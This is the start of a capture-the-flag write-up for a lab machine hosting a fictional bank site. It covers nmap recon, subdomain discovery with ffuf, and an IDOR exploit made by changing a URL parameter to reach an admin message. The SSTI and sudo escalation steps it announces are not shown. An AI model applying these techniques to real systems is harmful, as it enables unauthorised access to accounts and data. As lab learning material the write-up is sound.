Keyword: Privilege Escalation using Sudo, Server Side Template Injection (SSTI), Insecure Direct Object Reference (IDOR)

Okay but this is the painest challenge ever I’ve seen! I have to restart target machine several times just because mature of SSTI payload. Because of that, target machine’s IP address is different through screenshots.

Machine’s IP address: 10.10.2??.???

Attacker’s IP address: 10.4.126.108 (OpenVPN to local)

1. Recon

As first as ever, nmap -sC -sV 10.10.224.84 giving me 2 opened ports: 22 and 80

image.png

But we can’t directly access to http://10.10.224.84 because of domain resolution to cyprusbank.thm, like this challenge:

Lookup

After adding to /etc/hosts, open browser again:

image.png

Trying to use dirsearch to scan sub-directories, we get nothing. But if we scan subdomain using FFUF with below wordlist, we discovered a new subdomain: admin.cyprusbank.thm

image.png

Continuing add new subdomain into /etc/hosts, we found a login page, and we will use given credentials to login…

2. Exploit IDOR

Resource: https://portswigger.net/web-security/access-control/idor

image.png

As we looking at URL, we saw “c=5”. If you change number to something else, you will see different message. But what happen if we try to deliver “c=0”? (exploiting IDOR by changing ID to nearest integer.

image.png

Reading message, do you know what admin account we will type?